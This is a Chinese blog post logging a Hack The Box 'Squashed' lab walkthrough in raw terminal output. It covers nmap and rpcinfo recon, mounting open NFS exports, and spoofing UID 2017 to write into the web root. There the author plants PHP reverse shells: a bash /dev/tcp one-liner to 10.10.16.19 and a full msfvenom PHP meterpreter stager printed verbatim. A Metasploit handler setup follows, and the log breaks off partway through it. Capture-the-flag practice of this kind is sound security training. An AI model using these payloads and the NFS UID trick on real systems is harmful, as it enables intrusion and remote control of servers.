https://app.hackthebox.com/machines/Squashed

最新推荐文章于 2024-04-30 11:11:45 发布
最新推荐文章于 2024-04-30 11:11:45 发布
阅读量6.9k 收藏
点赞数
分类专栏: 笔记 hack the box 网络安全 文章标签: python 安全 ctf htb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47210241/article/details/130038726
版权
笔记 同时被 3 个专栏收录
19 篇文章 0 订阅
订阅专栏
网络安全
18 篇文章 0 订阅
订阅专栏
hack the box
10 篇文章 0 订阅
订阅专栏

https://app.hackthebox.com/machines/Squashed

image-20230408223923073

info collecting

┌──(kwkl㉿kwkl)-[~]
└─$ sudo nmap -A 10.10.11.191 -T4                                                                                                                                           1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 16:11 HKT
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.11.191 (10.10.11.191)
Host is up (0.62s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      41171/tcp   mountd
|   100005  1,2,3      49582/udp   mountd
|   100005  1,2,3      52017/tcp6  mountd
|   100005  1,2,3      52270/udp6  mountd
|   100021  1,3,4      40811/tcp   nlockmgr
|   100021  1,3,4      45367/tcp6  nlockmgr
|   100021  1,3,4      46131/udp6  nlockmgr
|   100021  1,3,4      47277/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/8%OT=22%CT=1%CU=40626%PV=Y%DS=2%DC=T%G=Y%TM=64312231
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M537ST11NW7%O2=M537ST11NW7%O3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11
OS:NW7%O6=M537ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M537NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   577.95 ms 10.10.16.1 (10.10.16.1)
2   291.62 ms 10.10.11.191 (10.10.11.191)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.11 seconds


┌──(kwkl㉿kwkl)-[~]
└─$ sudo nmap -A -v -sS -sV 10.10.11.191          
[sudo] kwkl 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 16:36 HKT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:36
Completed NSE at 16:36, 0.00s elapsed
Initiating NSE at 16:36
Completed NSE at 16:36, 0.00s elapsed
Initiating NSE at 16:36
Completed NSE at 16:36, 0.00s elapsed
Initiating Ping Scan at 16:36
Scanning 10.10.11.191 [4 ports]
Completed Ping Scan at 16:36, 0.33s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:36
Completed Parallel DNS resolution of 1 host. at 16:36, 0.00s elapsed
Initiating SYN Stealth Scan at 16:36
Scanning 10.10.11.191 (10.10.11.191) [1000 ports]
Discovered open port 80/tcp on 10.10.11.191
Discovered open port 111/tcp on 10.10.11.191
Discovered open port 22/tcp on 10.10.11.191
Discovered open port 2049/tcp on 10.10.11.191
Completed SYN Stealth Scan at 16:36, 5.48s elapsed (1000 total ports)
Initiating Service scan at 16:36
Scanning 4 services on 10.10.11.191 (10.10.11.191)
Completed Service scan at 16:36, 6.96s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.11.191 (10.10.11.191)
Retrying OS detection (try #2) against 10.10.11.191 (10.10.11.191)
Retrying OS detection (try #3) against 10.10.11.191 (10.10.11.191)
Retrying OS detection (try #4) against 10.10.11.191 (10.10.11.191)
Initiating Traceroute at 16:37
Completed Traceroute at 16:37, 0.62s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:37
Completed Parallel DNS resolution of 1 host. at 16:37, 0.00s elapsed
NSE: Script scanning 10.10.11.191.
Initiating NSE at 16:37
Completed NSE at 16:37, 31.08s elapsed
Initiating NSE at 16:37
Completed NSE at 16:37, 3.21s elapsed
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Nmap scan report for 10.10.11.191 (10.10.11.191)
Host is up (0.64s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      41171/tcp   mountd
|   100005  1,2,3      49582/udp   mountd
|   100005  1,2,3      52017/tcp6  mountd
|   100005  1,2,3      52270/udp6  mountd
|   100021  1,3,4      40811/tcp   nlockmgr
|   100021  1,3,4      45367/tcp6  nlockmgr
|   100021  1,3,4      46131/udp6  nlockmgr
|   100021  1,3,4      47277/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), Linux 5.0 - 5.3 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 21.536 days (since Sat Mar 18 03:45:38 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   608.28 ms 10.10.16.1 (10.10.16.1)
2   304.64 ms 10.10.11.191 (10.10.11.191)

NSE: Script Post-scanning.
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.57 seconds
           Raw packets sent: 1234 (59.494KB) | Rcvd: 1235 (72.093KB)

┌──(kwkl㉿kwkl)-[~]
└─$ rpcinfo -p 10.10.11.191                                                                                                                                                 1 ⨯
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp  42363  mountd
    100005    1   tcp  59251  mountd
    100005    2   udp  45798  mountd
    100005    2   tcp  58335  mountd
    100005    3   udp  49582  mountd
    100005    3   tcp  41171  mountd
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    3   tcp   2049
    100003    3   udp   2049  nfs
    100227    3   udp   2049
    100021    1   udp  47277  nlockmgr
    100021    3   udp  47277  nlockmgr
    100021    4   udp  47277  nlockmgr
    100021    1   tcp  40811  nlockmgr
    100021    3   tcp  40811  nlockmgr
    100021    4   tcp  40811  nlockmgr




┌──(kwkl㉿kwkl)-[~]
└─$ 
nmap --script=nfs-* 10.10.11.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 22:11 HKT
Nmap scan report for 10.10.11.191 (10.10.11.191)
Host is up (0.74s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
| nfs-showmount: 
|   /home/ross *
|_  /var/www/html *
2049/tcp open  nfs

Nmap done: 1 IP address (1 host up) scanned in 122.08 seconds

image-20230408223947588

mount nfs

                                                                                                                                                                       
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$                                                                                                                                                                       100 ⨯
sudo apt-get install nfs-common
[sudo] kwkl 的密码:
对不起,请重试。
[sudo] kwkl 的密码:
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成                 
下列软件包是自动安装的并且现在不需要了:
  blt buildah conmon fonts-lyx fuse-overlayfs gir1.2-ayatanaappindicator3-0.1 golang-github-containernetworking-plugin-dnsname golang-github-containers-common
  golang-github-containers-image isympy-common isympy3 libb2-1 libduktape207 libegl-dev libgl-dev libgl1-mesa-dev libgles-dev libgles1 libgles2 libglu1-mesa-dev libglut-dev
  libglut3.12 libglvnd-core-dev libglvnd-dev libglx-dev libjs-jquery-ui libjs-uglify libopengl-dev libostree-1-1 libperl5.34 libprotobuf32 libpython3.11-dev libpython3.9
  libpython3.9-dev libpython3.9-minimal libpython3.9-stdlib libqt6core6 libqt6dbus6 libqt6network6 libqt6sql6 libqt6sql6-sqlite libqt6test6 libqt6xml6 libslirp0 libsubid4
  libts0 libxext-dev perl-modules-5.34 podman python-matplotlib-data python3-appdirs python3-cycler python3-fs python3-mpmath python3-opengl python3-sympy python3.11
  python3.11-dev python3.11-minimal python3.9 python3.9-dev python3.9-minimal qt6-base-dev-tools qt6-translations-l10n qtchooser ruby-uglifier ruby2.7 slirp4netns
  tk8.6-blt2.5 uidmap unicode-data
使用'sudo apt autoremove'来卸载它(它们)。
将会同时安装下列软件:
  keyutils libkeyutils1 libnfsidmap1
建议安装:
  open-iscsi watchdog
下列【新】软件包将被安装:
  keyutils libnfsidmap1 nfs-common
下列软件包将被升级:
  libkeyutils1
升级了 1 个软件包,新安装了 3 个软件包,要卸载 0 个软件包,有 1860 个软件包未被升级。
需要下载 378 kB 的归档。
解压缩后会消耗 1,579 kB 的额外空间。
您希望继续执行吗? [Y/n] y
获取:1 https://kali.download/kali kali-rolling/main amd64 libkeyutils1 amd64 1.6.3-2 [8,808 B]
获取:2 https://kali.download/kali kali-rolling/main amd64 libnfsidmap1 amd64 1:2.6.2-4 [54.7 kB]
获取:3 https://kali.download/kali kali-rolling/main amd64 keyutils amd64 1.6.3-2 [54.5 kB]
获取:4 https://kali.download/kali kali-rolling/main amd64 nfs-common amd64 1:2.6.2-4 [260 kB]
已下载 378 kB,耗时 4秒 (96.3 kB/s) 
(正在读取数据库 ... 系统当前共安装有 389826 个文件和目录。)
准备解压 .../libkeyutils1_1.6.3-2_amd64.deb  ...
正在解压 libkeyutils1:amd64 (1.6.3-2) 并覆盖 (1.6.1-2) ...
正在设置 libkeyutils1:amd64 (1.6.3-2) ...
正在选中未选择的软件包 libnfsidmap1:amd64。
(正在读取数据库 ... 系统当前共安装有 389826 个文件和目录。)
准备解压 .../libnfsidmap1_1%3a2.6.2-4_amd64.deb  ...
正在解压 libnfsidmap1:amd64 (1:2.6.2-4) ...
正在选中未选择的软件包 keyutils。
准备解压 .../keyutils_1.6.3-2_amd64.deb  ...
正在解压 keyutils (1.6.3-2) ...
正在选中未选择的软件包 nfs-common。
准备解压 .../nfs-common_1%3a2.6.2-4_amd64.deb  ...
正在解压 nfs-common (1:2.6.2-4) ...
正在设置 libnfsidmap1:amd64 (1:2.6.2-4) ...
正在设置 keyutils (1.6.3-2) ...
正在设置 nfs-common (1:2.6.2-4) ...

Creating config file /etc/idmapd.conf with new version

Creating config file /etc/nfs.conf with new version
正在添加系统用户"statd" (UID 125)...
正在将新用户"statd" (UID 125)添加到组"nogroup"...
useradd warning: statd's uid 125 outside of the UID_MIN 1000 and UID_MAX 60000 range.
无法创建主目录"/var/lib/nfs"。
update-rc.d: As per Kali policy, nfs-common init script is left disabled.
Created symlink /etc/systemd/system/multi-user.target.wants/nfs-client.target → /lib/systemd/system/nfs-client.target.
Created symlink /etc/systemd/system/remote-fs.target.wants/nfs-client.target → /lib/systemd/system/nfs-client.target.
auth-rpcgss-module.service is a disabled or a static unit, not starting it.
nfs-idmapd.service is a disabled or a static unit, not starting it.
nfs-utils.service is a disabled or a static unit, not starting it.
proc-fs-nfsd.mount is a disabled or a static unit, not starting it.
rpc-gssd.service is a disabled or a static unit, not starting it.
rpc-statd-notify.service is a disabled or a static unit, not starting it.
rpc-statd.service is a disabled or a static unit, not starting it.
rpc-svcgssd.service is a disabled or a static unit, not starting it.
rpc_pipefs.target is a disabled or a static unit, not starting it.
var-lib-nfs-rpc_pipefs.mount is a disabled or a static unit, not starting it.
正在处理用于 libc-bin (2.36-8) 的触发器 ...
正在处理用于 man-db (2.9.4-2) 的触发器 ...
正在处理用于 kali-menu (2021.3.3) 的触发器 ...
Scanning processes...                                                                                                                                                           
Scanning candidates...                                                                                                                                                          
Scanning processor microcode...                                                                                                                                                 
Scanning linux images...                                                                                                                                                        

Running kernel seems to be up-to-date.

Failed to check for processor microcode upgrades.

Restarting services...
 systemctl restart packagekit.service
Service restarts being deferred:
 systemctl restart NetworkManager.service
 systemctl restart lightdm.service

No containers need to be restarted.

User sessions running outdated binaries:
 kwkl @ session #2: chrome[10972,10988,10989,10993], code[4353,4356,4357,4472,4589], panel-1-whisker[1563], xfce4-panel[1550], xfce4-session[1412], zsh[2746,3802]
 kwkl @ user manager service: systemd[1385]

No VM guests are running outdated hypervisor (qemu) binaries on this host.
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross    *
/var/www/html *

┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ showmount --all 10.10.11.191
All mount points on 10.10.11.191:
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ showmount --exports 10.10.11.191
Export list for 10.10.11.191:
/home/ross    *
/var/www/html *


┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo mount -t nfs 10.10.11.191:/home/ross /home/kwkl/HODL/htb/squashed/ross -o nolock                                                                                  32 ⨯
[sudo] kwkl 的密码:

┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed/ross]
└─$ sudo mount -t nfs 10.10.11.191:/var/www/html /home/kwkl/HODL/htb/squashed/html -o nolock
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed/ross]
└─$

files

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls -al ross
总用量 68
drwxr-xr-x 14 1001 1001 4096  4月  7 13:20 .
drwxr-xr-x  5 kwkl kwkl 4096  4月  8 22:23 ..
lrwxrwxrwx  1 root root    9 10月 20 21:24 .bash_history -> /dev/null
drwx------ 11 1001 1001 4096 10月 21 22:57 .cache
drwx------ 12 1001 1001 4096 10月 21 22:57 .config
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Desktop
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Documents
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Downloads
drwx------  3 1001 1001 4096 10月 21 22:57 .gnupg
drwx------  3 1001 1001 4096 10月 21 22:57 .local
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Music
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Pictures
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Public
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Templates
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Videos
lrwxrwxrwx  1 root root    9 10月 21 21:07 .viminfo -> /dev/null
-rw-------  1 1001 1001   57  4月  7 13:20 .Xauthority
-rw-------  1 1001 1001 2475  4月  7 13:20 .xsession-errors
-rw-------  1 1001 1001 2475 12月 27 23:33 .xsession-errors.old

┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls -al webhtml
ls: 无法访问 'webhtml/.': 权限不够
ls: 无法访问 'webhtml/..': 权限不够
ls: 无法访问 'webhtml/.htaccess': 权限不够
ls: 无法访问 'webhtml/index.html': 权限不够
ls: 无法访问 'webhtml/images': 权限不够
ls: 无法访问 'webhtml/css': 权限不够
ls: 无法访问 'webhtml/js': 权限不够
总用量 0
d????????? ? ? ? ?             ? .
d????????? ? ? ? ?             ? ..
?????????? ? ? ? ?             ? css
?????????? ? ? ? ?             ? .htaccess
?????????? ? ? ? ?             ? images
?????????? ? ? ? ?             ? index.html
?????????? ? ? ? ?             ? js


┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls -ld webhtml                                                                                                                                                          1 ⨯
drwxr-xr-- 5 2017 www-data 4096  4月  8 22:40 webhtml
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo useradd webuser                                                                                                  
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo usermod -u 2017 webuser              
                                  
                                  
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo passwd webuser                                                                                                                                                     1 ⨯
新的 密码:
重新输入新的 密码:
passwd:已成功更新密码
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ su webuser         
密码:
$ ls -al webhtml
总用量 56
drwxr-xr-- 5 webuser www-data  4096  4月  8 22:45 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:42 ..
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:45 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 js
$ cd webhtml

create user

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls -ld webhtml                                                                                                                                                          1 ⨯
drwxr-xr-- 5 2017 www-data 4096  4月  8 22:40 webhtml
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo useradd webuser                                                                                                  
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo usermod -u 2017 webuser              
                                   
                                                                                                                                                                                                                   
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo passwd webuser                                                                                                                                                     1 ⨯
新的 密码:
重新输入新的 密码:
passwd:已成功更新密码
      
 ┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.19 LPORT=5555 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1112 bytes
Saved as: shell.php


 
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ su webuser         
密码:
$ ls -al webhtml
总用量 56
drwxr-xr-- 5 webuser www-data  4096  4月  8 22:45 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:42 ..
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:45 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 js
$ cd webhtml
$ ls
css  images  index.html  js
$ cat <?php system("bash -c 'bash -i >& /dev/tcp/10.10.16.19/9999 0>&1'");?> >> 1.php
sh: 4: Syntax error: "(" unexpected
$ echo "<?php system("bash -c 'bash -i >& /dev/tcp/10.10.16.19/9999 0>&1'");?>" >> 1.php
$ ls
1.php  css  images  index.html  js
$ cat 1.php
<?php system(bash -c bash -i >& /dev/tcp/10.10.16.19/9999 0>&1);?>
$ ls
1.php  css  images  index.html  js
$ ls -al
总用量 60
drwxr-xr-- 5 webuser www-data  4096  4月  8 22:53 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:42 ..
-rw-r--r-- 1 webuser webuser     67  4月  8 22:53 1.php
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:50 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 js
$ ls -ld *
-rw-r--r-- 1 webuser webuser     67  4月  8 22:53 1.php
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 css
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:50 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 js
$ chmod 755 1.php
$ ls -al
总用量 60
drwxr-xr-- 5 webuser www-data  4096  4月  8 22:53 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:42 ..
-rwxr-xr-x 1 webuser webuser     67  4月  8 22:53 1.php
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:50 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 js
$ cat ../shell.php >> 2.php
$ cat 2.php
/*<?php /**/ error_reporting(0); $ip = '10.10.16.19'; $port = 5555; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();$ 
$ chmod +x 2.php
$ ls -al      
总用量 56
drwxr-xr-- 5 webuser www-data  4096  4月  8 23:00 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:57 ..
drwxr-xr-x 2 webuser www-data  4096  4月  8 23:00 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 23:00 images
-rw-r----- 1 webuser www-data 32532  4月  8 23:00 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 23:00 js
$ cat ../shell.php >> 2.php
$ webuser

or:

bash -i >& /dev/tcp/10.10.16.15/1337 0>&1

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.16.19/9999 0>&1'");?>

browser 2.php

image-20230409094439251

]
└─$ msfconsole                                                                       
[!] The following modules were loaded with warnings:
                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'                                                                                                                                                  
         `._    ,    /__,-'                                                                                                                                                     
            ""._\__,'< <____                                                                                                                                                    
                 | |  `----.`.                                                                                                                                                  
                 | |        \ `.                                                                                                                                                
                 ; |___      \-``                                                                                                                                               
                 \   --<                                                                                                                                                        
                  `.`.<                                                                                                                                                         
                    `-'                                                                                                                                                         
                                                                                                                                                                                
                                                                                                                                                                                

       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2266 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up 
to a file, use the makerc command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > exit
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ chmod 777  shell.php
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ msfconsole
[!] The following modules were loaded with warnings:
                                                  
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            https://metasploit.com


       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2266 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > use payload php/meterpreter/reverse_tcp 

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  payload/php/meterpreter/reverse_tcp                        normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   1  payload/php/meterpreter/reverse_tcp_uuid                   normal  No     PHP Meterpreter, PHP Reverse TCP Stager


Interact with a module by name or index. For example info 1, use 1 or use payload/php/meterpreter/reverse_tcp_uuid

msf6 exploit(multi/handler) > use 0
msf6 payload(php/meterpreter/reverse_tcp) > show options

Module options (payload/php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(php/meterpreter/reverse_tcp) > set lhost 10.10.16.19
lhost => 10.10.16.19
msf6 payload(php/meterpreter/reverse_tcp) > set lport 5555
lport => 5555
